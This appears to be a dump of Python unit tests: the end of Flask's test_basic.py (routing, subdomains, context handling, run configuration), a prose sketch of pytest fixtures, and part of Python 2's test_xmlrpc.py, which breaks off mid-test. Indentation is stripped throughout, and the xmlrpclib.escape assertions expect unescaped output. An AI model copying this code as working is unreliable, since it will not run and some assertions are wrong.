assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_server_name_subdomain():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
@app.route("/")
def index():
return "default"
@app.route("/", subdomain="foo")
def subdomain():
return "subdomain"
app.config["SERVER_NAME"] = "dev.local:5000"
rv = client.get("/")
assert rv.data == b"default"
rv = client.get("/", "http://dev.local:5000")
assert rv.data == b"default"
rv = client.get("/", "https://dev.local:5000")
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local:443"
rv = client.get("/", "https://dev.local")
# Werkzeug 1.0 fixes matching https scheme with 443 port
if rv.status_code != 404:
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local"
rv = client.get("/", "https://dev.local")
assert rv.data == b"default"
# suppress Werkzeug 1.0 warning about name mismatch
with pytest.warns(None):
rv = client.get("/", "http://foo.localhost")
assert rv.status_code == 404
rv = client.get("/", "http://foo.dev.local")
assert rv.data == b"subdomain"
@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
@pytest.mark.filterwarnings("ignore::pytest.PytestUnhandledThreadExceptionWarning")
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
    # We have to run this test in an isolated thread because if the
    # debug flag is set to true and an exception happens, the context is
    # not torn down. This causes other tests that run after this one to
    # fail when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
        raise AssertionError()  # should not be reached; the oversized form access above raises 413 first
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
        raise AssertionError()  # should not be reached; the oversized form access above raises 413 first
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route("/киртест")
def index():
return "Hello World!"
rv = client.get("/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e.value)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e.value)
assert "Make sure to directly send your POST-request to this URL" in str(
e.value
)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for _x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# suppress Werkzeug 0.15 warning about name mismatch
with pytest.warns(None):
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
        assert rv.status_code == (404 if matching else 204)
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
        assert rv.status_code == (404 if matching else 204)
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View:
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = f"running on {hostname}:{port} ..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == f"running on {hostname}:{port} ..."
@pytest.mark.parametrize(
"host,port,server_name,expect_host,expect_port",
(
(None, None, "pocoo.org:8080", "pocoo.org", 8080),
("localhost", None, "pocoo.org:8080", "localhost", 8080),
(None, 80, "pocoo.org:8080", "pocoo.org", 80),
("localhost", 80, "pocoo.org:8080", "localhost", 80),
("localhost", 0, "localhost:8080", "localhost", 0),
(None, None, "localhost:8080", "localhost", 8080),
(None, None, "localhost:0", "localhost", 0),
),
)
def test_run_from_config(
monkeypatch, host, port, server_name, expect_host, expect_port, app
):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = server_name
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
@require_cpython_gc
def test_app_freed_on_zero_refcount():
# A Flask instance should not create a reference cycle that prevents CPython
# from freeing it when all external references to it are released (see #3761).
gc.disable()
try:
app = flask.Flask(__name__)
assert app.view_functions["static"]
weak = weakref.ref(app)
assert weak() is not None
del app
assert weak() is None
finally:
gc.enable()
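The fixtures app, client, req_ctx, and app_ctx used throughout test_basic.py are provided by a conftest.py that is not included in this dump. A minimal sketch of what such fixtures could look like, assuming only the public pytest and Flask APIs (the names and config values below are illustrative, not the project's actual conftest):

import flask
import pytest


@pytest.fixture
def app():
    # Illustrative application fixture; the real conftest may configure more.
    app = flask.Flask(__name__)
    app.testing = True
    app.secret_key = "test key"  # the session tests require a secret key
    return app


@pytest.fixture
def client(app):
    # Werkzeug test client bound to the app fixture.
    return app.test_client()


@pytest.fixture
def req_ctx(app):
    # Push a request context for tests that use flask.request / flask.session.
    with app.test_request_context() as ctx:
        yield ctx


@pytest.fixture
def app_ctx(app):
    # Push an application context for tests that use flask.g.
    with app.app_context() as ctx:
        yield ctx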
test_xmlrpc.py
import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import threading
import mimetools
import httplib
import socket
import os
from test import test_support
try:
unicode
except NameError:
have_unicode = False
else:
have_unicode = True
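# Sample payload covering the marshallable types (string, float, int, long,
# list, Binary, boolean, unicode values and keys, and DateTime built from a
# string, a time tuple, and a datetime); the round-trip tests below dump and
# reload this structure.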
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'unicode': u'\u4000\u6000\u8000',
u'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEquals(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assert_(dt == now)
self.assert_(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assert_(then >= dt)
self.assert_(dt < then)
    def test_bug_1164912(self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assert_(isinstance(new_d.value, str))
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assert_(isinstance(s, str))
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEquals(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEquals(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. reload(sys) is the way to get it back.
old_encoding = sys.getdefaultencoding()
setdefaultencoding_existed = hasattr(sys, "setdefaultencoding")
reload(sys) # ugh!
sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
sys.setdefaultencoding(old_encoding)
if not setdefaultencoding_existed:
del sys.setdefaultencoding
items = d.items()
if have_unicode:
self.assertEquals(s, u"abc \x95")
self.assert_(isinstance(s, unicode))
self.assertEquals(items, [(u"def \x96", u"ghi \x97")])
self.assert_(isinstance(items[0][0], unicode))
self.assert_(isinstance(items[0][1], unicode))
else:
self.assertEquals(s, "abc \xc2\x95")
self.assertEquals(items, [("def \xc2\x96", "ghi \xc2\x97")])
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEquals(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEquals(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
        self.assertEqual(t2, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
PORT = None
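# PORT is filled in by http_server() once the server socket has been bound to
# a free port, and reset to None again when the server shuts down.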
# The evt is set twice: first when the server is ready to serve, and again
# when the server has been shut down. The caller must clear the event after
# it has been set the first time in order to catch the second set.
def http_server(evt, numrequests):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
try:
serv = MyXMLRPCServer(("localhost", 0),
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
global PORT
PORT = serv.socket.getsockname()[1]
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket.
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(unittest.TestCase):
def setUp(self):
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection('localhost', PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains:
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
#   'method "this_is_not_exists" is not supported'}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assert_(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
os.environ['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# capture stdout output
tmp = sys.stdout
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdout.close()
sys.stdout = tmp
# parse Status header
handle = open(test_support.TESTFN, "r").read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
os.remove(test_support.TESTFN)
os.environ['REQUEST_METHOD'] = ''
def test_cgi_xmlrpc_response(self):
